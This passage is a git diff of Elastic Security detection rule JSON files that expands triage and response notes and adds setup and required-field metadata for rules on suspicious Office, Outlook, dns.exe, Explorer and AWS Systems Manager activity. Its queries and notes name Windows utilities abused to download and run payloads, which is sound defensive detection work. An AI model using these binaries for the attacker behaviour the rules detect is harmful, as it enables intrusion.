File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\") and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"certutil.exe\",\n \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\",\n \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\",\n \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\",\n \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\",\n \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json index fdb5fdac2629a..a7b9fba92b586 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious MS Outlook Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is\nwidely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious\ndocuments and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. Common\nlocations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json index 15c7eed349361..7ce63923da109 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json @@ -16,7 +16,7 @@ "language": "lucene", "license": "Elastic License v2", "name": "Inbound Connection to an Unsecure Elasticsearch Node", - "note": "## Config\n\nThis rule requires the addition of port `9200` and `send_all_headers` to the `HTTP` protocol configuration in `packetbeat.yml`. See the References section for additional configuration documentation.", + "note": "", "query": "event.category:network_traffic AND network.protocol:http AND status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:\"image/x-icon\" AND NOT _exists_:http.request.headers.authorization\n", "references": [ "https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html", @@ -24,6 +24,7 @@ ], "risk_score": 47, "rule_id": "31295df3-277b-4c56-a1fb-84e31b4222a9", + "setup": "This rule requires the addition of port `9200` and `send_all_headers` to the `HTTP` protocol configuration in `packetbeat.yml`. See the References section for additional configuration documentation.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +52,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json index a842c79a8e43a..72736650835e3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json @@ -15,15 +15,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Child Process of dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual Child Process\nDetection alerts from this rule indicate potential suspicious child processes spawned after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Any suspicious or abnormal child process spawned from dns.exe should be reviewed and investigated with care. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (whoami.exe, netstat.exe, systeminfo.exe, tasklist.exe).\n- Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: mshta.exe, powershell.exe, regsvr32.exe, rundll32.exe, wscript.exe, wmic.exe.\n- If the DoS exploit is successful and DNS Server service crashes, be mindful of potential child processes related to werfault.exe occurring.\n- Any subsequent activity following the child process spawned related to execution/network activity should be thoroughly reviewed from the endpoint.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server\nversions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated\nprivileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can\neffectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a \nsimilar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's\n impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in\n discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be\n considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`,\n `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to\n `werfault.exe` occurring.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "https://github.com/maxpl0it/CVE-2020-1350-DoS" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json index 43e33bf36f1cf..a814e580081f1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Modification by dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.", "query": "file where process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\"\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json index 814fea368d719..ee35fed5bdff9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Explorer Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -55,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json index 70fadcc29f648..21181a72e2086 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Execution via System Manager", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Execution via System Manager\n\nAmazon EC2 Systems Manager is a management service designed to help users automatically collect software inventory, apply\noperating system patches, create system images, and configure Windows and Linux operating systems.\n\nThis rule looks for the execution of commands and scripts using System Manager. Note that the actual contents of these\nscripts and commands are not included in the event, so analysts must gain visibility using an host-level security product.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Investigate the commands or scripts using host-level visibility.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ssm.amazonaws.com and event.action:SendCommand and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-plugins.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "37b211e8-4e2f-440f-86d8-06cc8f158cfa", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Log Auditing" + "Log Auditing", + "Initial Access" ], "threat": [ { @@ -57,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json index 8c3ae88116a79..fb93e33716ef1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json @@ -9,14 +9,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Zoom Meeting with no Passcode", - "note": "## Config\n\nThe Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.type:creation and event.module:zoom and event.dataset:zoom.webhook and\n event.action:meeting.created and not zoom.meeting.password:*\n", "references": [ "https://blog.zoom.us/a-message-to-our-users/", "https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "zoom.meeting.password", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba", + "setup": "The Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json index 3ff80de634b46..3518aa955457f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json @@ -13,6 +13,38 @@ "license": "Elastic License v2", "name": "Service Command Lateral Movement", "query": "sequence by process.entity_id with maxspan = 1m\n [process where event.type in (\"start\", \"process_started\") and\n (process.name : \"sc.exe\" or process.pe.original_file_name : \"sc.exe\") and\n process.args : \"\\\\\\\\*\" and process.args : (\"binPath=*\", \"binpath=*\") and\n process.args : (\"create\", \"config\", \"failure\", \"start\")]\n [network where process.name : \"sc.exe\" and destination.ip != \"127.0.0.1\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc", "severity": "low", @@ -85,5 +117,5 @@ } ], "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json index 0fd10fc807846..f3a2bb02635a1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json @@ -15,6 +15,23 @@ "references": [ "https://github.com/its-a-feature/bifrost" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "16904215-2c95-4ac8-bf5c-12354e047192", "severity": "high", @@ -74,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json index 50178d20af2a1..9ad0451b4a01a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json @@ -12,10 +12,62 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with 